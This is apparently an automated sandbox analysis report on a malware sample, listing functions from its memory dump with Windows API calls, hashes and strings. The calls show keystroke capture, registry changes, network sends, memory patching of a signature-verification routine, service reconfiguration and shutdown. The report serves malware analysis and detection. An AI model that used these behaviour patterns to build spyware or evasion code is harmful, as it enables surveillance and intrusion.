                                                                                                                                                    • Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: FileFind$CloseDirectoryRemove$AttributesDeleteErrorFirstLastNext
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2341273852-0
                                                                                                                                                    • Opcode ID: e9b6dd60e8ce79dbea7926c77c210222cc8d736e8b5525c7570b64925c2837bc
                                                                                                                                                    • Instruction ID: 72ae7c700e7caa25d8a5b5d09b59d0011caae568d03fd1799f61acdea4947676
                                                                                                                                                    • Opcode Fuzzy Hash: e9b6dd60e8ce79dbea7926c77c210222cc8d736e8b5525c7570b64925c2837bc
                                                                                                                                                    • Instruction Fuzzy Hash: 6E319472D1622C9EEB64D6B0CC88EDBB77DAF05210F4005A9E595D3050EF71AAC4CBE4
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 1568A3E0 Relevance: 12.1, APIs: 8, Instructions: 112keyboardthreadCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetForegroundWindow.USER32 ref: 1568A416
                                                                                                                                                    • GetWindowThreadProcessId.USER32(00000000,?), ref: 1568A422
                                                                                                                                                    • GetKeyboardLayout.USER32(00000000), ref: 1568A429
                                                                                                                                                    • GetKeyState.USER32(00000010), ref: 1568A433
                                                                                                                                                    • GetKeyboardState.USER32(?), ref: 1568A43E
                                                                                                                                                    • ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 1568A461
                                                                                                                                                    • ToUnicodeEx.USER32(?,?,00000010,00000000,00000000), ref: 1568A4C1
                                                                                                                                                    • ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 1568A4FA
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Unicode$KeyboardStateWindow$ForegroundLayoutProcessThread
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1888522110-0
                                                                                                                                                    • Opcode ID: fc2bb577e35b427f2ad09be9a3bf833a05f938b2432bc6321c911638d2bc9eab
                                                                                                                                                    • Instruction ID: 34692b70177bda607174dfacb896bfef0a7f3f63ee925554452d43417c29c038
                                                                                                                                                    • Opcode Fuzzy Hash: fc2bb577e35b427f2ad09be9a3bf833a05f938b2432bc6321c911638d2bc9eab
                                                                                                                                                    • Instruction Fuzzy Hash: 0D315372514318BFD710DAA4CC84F9B77ECEB48754F01092EFA4586190EBB1A958CBD1
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 15693FCA Relevance: 10.9, APIs: 4, Strings: 2, Instructions: 382registrylibraryloaderCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • RegCreateKeyExW.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 1569409D
                                                                                                                                                    • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 156940A9
                                                                                                                                                      • Part of subcall function 15684AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 15684B36
                                                                                                                                                    • LoadLibraryA.KERNEL32(Shlwapi.dll,SHDeleteKeyW,00000000,00000001), ref: 1569426A
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 15694271
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AddressCloseCreateLibraryLoadProcsend
                                                                                                                                                    • String ID: SHDeleteKeyW$Shlwapi.dll
                                                                                                                                                    • API String ID: 2127411465-314212984
                                                                                                                                                    • Opcode ID: 53492c655cc12d5c972f98d012723481f796b577a0b297cb5581f89e3e3a6a31
                                                                                                                                                    • Instruction ID: 328b08d044932d610580030d481f03e12f7dfd768ed6cffc57c2910fae5da924
                                                                                                                                                    • Opcode Fuzzy Hash: 53492c655cc12d5c972f98d012723481f796b577a0b297cb5581f89e3e3a6a31
                                                                                                                                                    • Instruction Fuzzy Hash: DFB1EA79B06304ABCA18FB74DC69CAF76A9AF91551F80061CF543971D0EE70BA08C3DA
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 156C9190 Relevance: 10.9, APIs: 7, Instructions: 370timeCOMMONLIBRARYCODE
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • _free.LIBCMT ref: 156C9212
                                                                                                                                                    • _free.LIBCMT ref: 156C9236
                                                                                                                                                    • _free.LIBCMT ref: 156C93BD
                                                                                                                                                    • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,156DF234), ref: 156C93CF
                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,156F2764,000000FF,00000000,0000003F,00000000,?,?), ref: 156C9447
                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,156F27B8,000000FF,?,0000003F,00000000,?), ref: 156C9474
                                                                                                                                                    • _free.LIBCMT ref: 156C9589
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _free$ByteCharMultiWide$InformationTimeZone
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 314583886-0
                                                                                                                                                    • Opcode ID: 990dd7332bf758cc1c05586778c1319dd35a741cf6021583be6bef1652e4adaf
                                                                                                                                                    • Instruction ID: c9d96bb7077e7320a9875ee30abe692ae7cd66fc3713d663c62deea97177b1b8
                                                                                                                                                    • Opcode Fuzzy Hash: 990dd7332bf758cc1c05586778c1319dd35a741cf6021583be6bef1652e4adaf
                                                                                                                                                    • Instruction Fuzzy Hash: 06C15975E04259ABDB10CF78CC90A9EBBB9FF46220F1441DED89597680EB34BA01CBD4
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 02DF7AC0 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 40librarynativeloaderCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • LoadLibraryW.KERNEL32(bcrypt,02DF9A30,Initialize,02E45360,02DF9A30,UacScan,02E45360,02DF9A30,UacInitialize,02E45360,02DF9A30,00000000,02E453DC,ScanString,02E45360,02DF9A30), ref: 02DF7AD2
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 02DF7ADF
                                                                                                                                                    • NtWriteVirtualMemory.C:\WINDOWS\SYSTEM32\NTDLL(00000000,00000000,?,00000001,?,00000000,BCryptVerifySignature,bcrypt,02DF9A30,Initialize,02E45360,02DF9A30,UacScan,02E45360,02DF9A30,UacInitialize), ref: 02DF7AF6
                                                                                                                                                    • FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,02DF9A30,Initialize,02E45360,02DF9A30,UacScan,02E45360,02DF9A30,UacInitialize,02E45360,02DF9A30,00000000,02E453DC), ref: 02DF7B05
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1428399500.0000000002DE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DE0000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1428298505.0000000002DE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1428558383.0000000002E0B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_2de0000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Library$AddressFreeLoadMemoryProcVirtualWrite
                                                                                                                                                    • String ID: BCryptVerifySignature$bcrypt
                                                                                                                                                    • API String ID: 1002360270-4067648912
                                                                                                                                                    • Opcode ID: d2a3008a50399d88397a102e4969a90be7e333f7e414e1e715cc2db803d12723
                                                                                                                                                    • Instruction ID: b3912bed1410f6b0adaaa0e87577b7ff9f18202dc9aa8d11e67660f4d5b125b8
                                                                                                                                                    • Opcode Fuzzy Hash: d2a3008a50399d88397a102e4969a90be7e333f7e414e1e715cc2db803d12723
                                                                                                                                                    • Instruction Fuzzy Hash: 35F0E2B26093543EEA61A2285C80EFFA29DCBC37B0F05466DFA5496380DB61CC04C3F5
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 15697952 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 33COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetCurrentProcess.KERNEL32(00000028,?), ref: 1569795F
                                                                                                                                                    • OpenProcessToken.ADVAPI32(00000000), ref: 15697966
                                                                                                                                                    • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 15697978
                                                                                                                                                    • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 15697997
                                                                                                                                                    • GetLastError.KERNEL32 ref: 1569799D
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
                                                                                                                                                    • String ID: SeShutdownPrivilege
                                                                                                                                                    • API String ID: 3534403312-3733053543
                                                                                                                                                    • Opcode ID: 07389581c53ea89274bec6fb1714d85ec9a9121d333c0b796cc68da487866438
                                                                                                                                                    • Instruction ID: 5e7f70e0009f7d0ef0d2f35df2697fe3bbe4da42eec4296a7d7eb2e5123f04c4
                                                                                                                                                    • Opcode Fuzzy Hash: 07389581c53ea89274bec6fb1714d85ec9a9121d333c0b796cc68da487866438
                                                                                                                                                    • Instruction Fuzzy Hash: B3F0DA7181212DABDB10ABA1DD8DEEF7FBDEF05225F110558FD45A1144DB344A04CAF1
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 156D4159 Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1381COMMONLIBRARYCODE
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: __floor_pentium4
                                                                                                                                                    • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                                                                                    • API String ID: 4168288129-2761157908
                                                                                                                                                    • Opcode ID: 86f37db820e52bc95f1b680400061f6fe54ebee5e57fa6c185edcd678616e1cc
                                                                                                                                                    • Instruction ID: 715df507e8124342435376403b6b4ada8024d2b00f6ae51b05de552adeea40d6
                                                                                                                                                    • Opcode Fuzzy Hash: 86f37db820e52bc95f1b680400061f6fe54ebee5e57fa6c185edcd678616e1cc
                                                                                                                                                    • Instruction Fuzzy Hash: 7EC24971E096298FDB24CE289D407D9B3B5FB44305F1549EAD88EE7640E7B4AE81CF80
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 15689253 Relevance: 9.3, APIs: 6, Instructions: 293fileCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • __EH_prolog.LIBCMT ref: 15689258
                                                                                                                                                      • Part of subcall function 156848C8: connect.WS2_32(FFFFFFFF,?,?), ref: 156848E0
                                                                                                                                                      • Part of subcall function 15684AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 15684B36
                                                                                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 156892F4
                                                                                                                                                    • FindFirstFileW.KERNEL32(00000000,?,?,?,00000064), ref: 15689352
                                                                                                                                                    • FindNextFileW.KERNEL32(00000000,?), ref: 156893AA
                                                                                                                                                    • FindClose.KERNEL32(00000000), ref: 156893C1
                                                                                                                                                      • Part of subcall function 15684E26: WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,156F4EF8,?,00000000,156F4EF8,15684CA8,00000000,00000000,00000000,00000000,156F4EF8,15684AC9), ref: 15684E38
                                                                                                                                                      • Part of subcall function 15684E26: SetEvent.KERNEL32(00000000,?,00000000,156F4EF8,15684CA8,00000000,00000000,00000000,00000000,156F4EF8,15684AC9), ref: 15684E43
                                                                                                                                                      • Part of subcall function 15684E26: CloseHandle.KERNEL32(00000000,?,00000000,156F4EF8,15684CA8,00000000,00000000,00000000,00000000,156F4EF8,15684AC9), ref: 15684E4C
                                                                                                                                                    • FindClose.KERNEL32(00000000), ref: 156895B9
                                                                                                                                                      • Part of subcall function 15684AA1: WaitForSingleObject.KERNEL32(?,00000000,15681A45,?,?,00000004,?,?,00000004,156F6B50,156F4EE0,00000000), ref: 15684B47
                                                                                                                                                      • Part of subcall function 15684AA1: SetEvent.KERNEL32(?,?,?,00000004,?,?,00000004,156F6B50,156F4EE0,00000000,?,?,?,?,?,15681A45), ref: 15684B75
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Find$Close$EventFileObjectSingleWait$Exception@8FirstH_prologHandleNextThrowconnectsend
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1824512719-0
                                                                                                                                                    • Opcode ID: efb554fa46378d10d7f83ce7a939e89f05474e7d942c26e73401071d00ce3f90
                                                                                                                                                    • Instruction ID: f8c2ad16183272faec07a75e45e3239414e26db3ae560d6dcdca693bb6761962
                                                                                                                                                    • Opcode Fuzzy Hash: efb554fa46378d10d7f83ce7a939e89f05474e7d942c26e73401071d00ce3f90
                                                                                                                                                    • Instruction Fuzzy Hash: 66B17E76A022199BCB14EBA0DD91EEDB7B9BF04314F104259E506A7190EF30BF49CBD4
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 1569AC78 Relevance: 9.1, APIs: 6, Instructions: 67serviceCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • OpenSCManagerW.ADVAPI32(00000000,00000000,00000002,00000000,00000000,?,?,?,1569A38E,00000000), ref: 1569AC88
                                                                                                                                                    • OpenServiceW.ADVAPI32(00000000,00000000,00000002,?,?,?,1569A38E,00000000), ref: 1569AC9C
                                                                                                                                                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,1569A38E,00000000), ref: 1569ACA9
                                                                                                                                                    • ChangeServiceConfigW.ADVAPI32(00000000,000000FF,00000004,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,1569A38E,00000000), ref: 1569ACDE
                                                                                                                                                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,1569A38E,00000000), ref: 1569ACF0
                                                                                                                                                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,1569A38E,00000000), ref: 1569ACF3
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Service$CloseHandle$Open$ChangeConfigManager
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 493672254-0
                                                                                                                                                    • Opcode ID: e2fd041ec7becb80ce003be13a83fd7390db55e59c122f61cfc9249d6cf5bfae
                                                                                                                                                    • Instruction ID: 3a7fc22a9ba0682a9975bd80c4b4b92b612a711fdcf0e0bbf5d47b1bec958739
                                                                                                                                                    • Opcode Fuzzy Hash: e2fd041ec7becb80ce003be13a83fd7390db55e59c122f61cfc9249d6cf5bfae
                                                                                                                                                    • Instruction Fuzzy Hash: F901F971555129BFDB044A385C8DE6E3BACEB42170F04070EFD65DA5C0DFA09A05D5E5
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 156967B4 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 97libraryloadershutdownCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 15697952: GetCurrentProcess.KERNEL32(00000028,?), ref: 1569795F
                                                                                                                                                      • Part of subcall function 15697952: OpenProcessToken.ADVAPI32(00000000), ref: 15697966
                                                                                                                                                      • Part of subcall function 15697952: LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 15697978
                                                                                                                                                      • Part of subcall function 15697952: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 15697997
                                                                                                                                                      • Part of subcall function 15697952: GetLastError.KERNEL32 ref: 1569799D
                                                                                                                                                    • ExitWindowsEx.USER32(00000000,00000001), ref: 15696856
                                                                                                                                                    • LoadLibraryA.KERNEL32(PowrProf.dll,SetSuspendState,00000000,00000000,00000000), ref: 1569686B
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 15696872
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ProcessToken$AddressAdjustCurrentErrorExitLastLibraryLoadLookupOpenPrivilegePrivilegesProcValueWindows
                                                                                                                                                    • String ID: PowrProf.dll$SetSuspendState
                                                                                                                                                    • API String ID: 1589313981-1420736420
                                                                                                                                                    • Opcode ID: c8192ea0bfecc391a42e367e1b15ff21cc3a389a3dce5efc41c553d72a458f32
                                                                                                                                                    • Instruction ID: dd5784d971f97ed939348ae5e95a0ac21737ecc321b1e7a6f1a47bc026726c64
                                                                                                                                                    • Opcode Fuzzy Hash: c8192ea0bfecc391a42e367e1b15ff21cc3a389a3dce5efc41c553d72a458f32
                                                                                                                                                    • Instruction Fuzzy Hash: D92196787063099BDF18EBB48C689EE235E9F51240F400C29A642971C4EE74BC08C3E9
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 1568F7A7 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 88sleepCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 15693549: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,00000000,00000000), ref: 15693569
                                                                                                                                                      • Part of subcall function 15693549: RegQueryValueExA.ADVAPI32(00000000,?,00000000,?,?,?), ref: 15693587
                                                                                                                                                      • Part of subcall function 15693549: RegCloseKey.ADVAPI32(00000000), ref: 15693592
                                                                                                                                                    • Sleep.KERNEL32(00000BB8), ref: 1568F85B
                                                                                                                                                    • ExitProcess.KERNEL32 ref: 1568F8CA
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CloseExitOpenProcessQuerySleepValue
                                                                                                                                                    • String ID: 4.9.4 Pro$override$pth_unenc
                                                                                                                                                    • API String ID: 2281282204-930821335
                                                                                                                                                    • Opcode ID: 7cd6e055468969a6bff5a027e7ba8d8fb18ab9b41012930234f6a450eb929a29
                                                                                                                                                    • Instruction ID: 8bf4d5a04dd6098ea8c184729b66aeea87c789ae6d7f940d8db1bf657f8f4b4d
                                                                                                                                                    • Opcode Fuzzy Hash: 7cd6e055468969a6bff5a027e7ba8d8fb18ab9b41012930234f6a450eb929a29
                                                                                                                                                    • Instruction Fuzzy Hash: EB210679F16340DBCA08B6798C55AAE7AAA9B81110F80021CF4169B3C4FF24B900C3FF
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 156D243C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 86COMMONLIBRARYCODE
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetLocaleInfoW.KERNEL32(FDE8FE81,2000000B,00000000,00000002,00000000,?,?,?,156D275B,?,00000000), ref: 156D24D5
                                                                                                                                                    • GetLocaleInfoW.KERNEL32(FDE8FE81,20001004,00000000,00000002,00000000,?,?,?,156D275B,?,00000000), ref: 156D24FE
                                                                                                                                                    • GetACP.KERNEL32(?,?,156D275B,?,00000000), ref: 156D2513
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: InfoLocale
                                                                                                                                                    • String ID: ACP$OCP
                                                                                                                                                    • API String ID: 2299586839-711371036
                                                                                                                                                    • Opcode ID: e7750f5709077f2471029e48186f78697de6462744a0c3647559af06b8730bdf
                                                                                                                                                    • Instruction ID: 3f46f85d2f8445b0fd4910317a566f0cf7a63a61b0f34acb98a2b566dc085d1e
                                                                                                                                                    • Opcode Fuzzy Hash: e7750f5709077f2471029e48186f78697de6462744a0c3647559af06b8730bdf
                                                                                                                                                    • Instruction Fuzzy Hash: 02217132A14306A6E725CF54C944EABF3ABFB44A74B468E64ED89D7510EB32D940C3D0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 1569B4A8 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 25COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • FindResourceA.KERNEL32(SETTINGS,0000000A,00000000), ref: 1569B4B9
                                                                                                                                                    • LoadResource.KERNEL32(00000000,?,?,1568F3DE,00000000), ref: 1569B4CD
                                                                                                                                                    • LockResource.KERNEL32(00000000,?,?,1568F3DE,00000000), ref: 1569B4D4
                                                                                                                                                    • SizeofResource.KERNEL32(00000000,?,?,1568F3DE,00000000), ref: 1569B4E3
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Resource$FindLoadLockSizeof
                                                                                                                                                    • String ID: SETTINGS
                                                                                                                                                    • API String ID: 3473537107-594951305
                                                                                                                                                    • Opcode ID: cfe9567d4bdf4631ec9f138bb47bc08810f2ceccb63521e6558f43ae4fc83915
                                                                                                                                                    • Instruction ID: 284bbaadc967fa94bd3067a17dd4b8426cf685d6191f73c4bc7518a2225e2ee2
                                                                                                                                                    • Opcode Fuzzy Hash: cfe9567d4bdf4631ec9f138bb47bc08810f2ceccb63521e6558f43ae4fc83915
                                                                                                                                                    • Instruction Fuzzy Hash: 70E01A76A20229BBDB251BA5CCDCD563E3EFBC9763300056DF94296220CF318400DBE0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 15689665 Relevance: 7.7, APIs: 5, Instructions: 222fileCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • __EH_prolog.LIBCMT ref: 1568966A
                                                                                                                                                    • FindFirstFileW.KERNEL32(00000000,?,00000000,00000000,?), ref: 156896E2
                                                                                                                                                    • FindNextFileW.KERNEL32(00000000,?), ref: 1568970B
                                                                                                                                                    • FindClose.KERNEL32(000000FF,?,?,?,?,?,?), ref: 15689722
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Find$File$CloseFirstH_prologNext
